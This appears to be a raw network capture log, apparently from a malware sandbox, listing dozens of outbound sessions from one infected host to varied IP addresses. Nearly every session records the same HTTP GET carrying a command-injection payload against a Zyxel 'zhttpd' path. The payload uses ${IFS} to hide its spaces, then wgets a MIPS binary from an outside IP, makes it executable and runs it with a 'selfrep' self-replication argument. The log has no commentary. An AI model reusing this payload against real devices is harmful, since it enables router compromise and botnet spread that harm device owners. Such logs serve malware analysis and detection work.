                                          Jan 14, 2024 15:46:03.746381998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1250192.168.2.2354320158.247.251.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746413946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1251192.168.2.234402238.231.44.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746423960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1252192.168.2.234518878.203.164.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746427059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1253192.168.2.234169814.106.11.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746463060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1254192.168.2.2333450135.191.19.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746469975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1255192.168.2.234046064.55.187.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746490955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1256192.168.2.2338100117.199.27.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746504068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1257192.168.2.2333960168.254.203.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746556044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1258192.168.2.2339036142.143.209.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746582031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1259192.168.2.2335156211.48.23.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746609926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1260192.168.2.234348041.62.59.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.746645927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1261192.168.2.2354412154.90.76.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747030973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1262192.168.2.2343052202.236.178.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747045994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1263192.168.2.234046814.46.25.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747056007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1264192.168.2.2355974168.213.6.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747097015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1265192.168.2.234708063.122.164.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747117996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1266192.168.2.23585604.254.15.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747154951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1267192.168.2.235978458.193.99.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747172117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1268192.168.2.234055278.47.234.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747220993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1269192.168.2.2347810216.238.119.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747220993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1270192.168.2.2348752132.212.152.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747241974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1271192.168.2.2343290111.115.145.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747302055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1272192.168.2.2349642108.174.123.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747301102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1273192.168.2.2336256183.225.237.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747313976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1274192.168.2.2345612169.78.210.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747325897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1275192.168.2.2345856132.80.188.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747370958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1276192.168.2.234137474.126.213.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747416019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1277192.168.2.234661257.1.243.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747422934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1278192.168.2.234025865.169.17.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747443914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1279192.168.2.2352264104.150.156.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747474909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1280192.168.2.235826897.137.196.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747504950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1281192.168.2.2338258184.122.27.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747533083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1282192.168.2.2351766208.48.254.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747555017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1283192.168.2.2355508170.214.64.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747596979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1284192.168.2.2341088107.81.165.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747608900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1285192.168.2.233912891.82.230.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747632027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1286192.168.2.2344196175.59.216.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747661114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1287192.168.2.235339695.35.5.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747680902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1288192.168.2.234603058.236.129.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747689962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1289192.168.2.2359578148.35.14.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747716904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1290192.168.2.2347380196.187.233.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747767925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1291192.168.2.2341844177.72.48.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747788906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1292192.168.2.2357600170.65.103.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747798920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1293192.168.2.235005473.38.80.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747838020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1294192.168.2.2355362117.67.214.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747838020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1295192.168.2.235057425.227.215.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747879028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1296192.168.2.2347990168.121.55.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747884035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1297192.168.2.2353274128.58.247.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747966051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1298192.168.2.2349358134.105.190.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747973919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1299192.168.2.2349204168.4.45.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.747973919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1300192.168.2.234221058.144.65.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748006105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1301192.168.2.2355840162.23.218.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748037100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1302192.168.2.234034058.69.198.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748085022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1303192.168.2.2356726122.179.95.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748090029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1304192.168.2.2360310111.196.186.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748094082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1305192.168.2.2341838172.69.12.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748131037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1306192.168.2.2332870196.110.181.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748178005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1307192.168.2.234272241.211.177.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748203993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1308192.168.2.2342362199.45.104.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748220921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1309192.168.2.2335918147.27.192.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748234987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1310192.168.2.235457286.71.247.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748259068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1311192.168.2.23336301.217.37.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748279095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1312192.168.2.2332954175.212.127.117443
                                          TimestampBytes transferredDirectionData
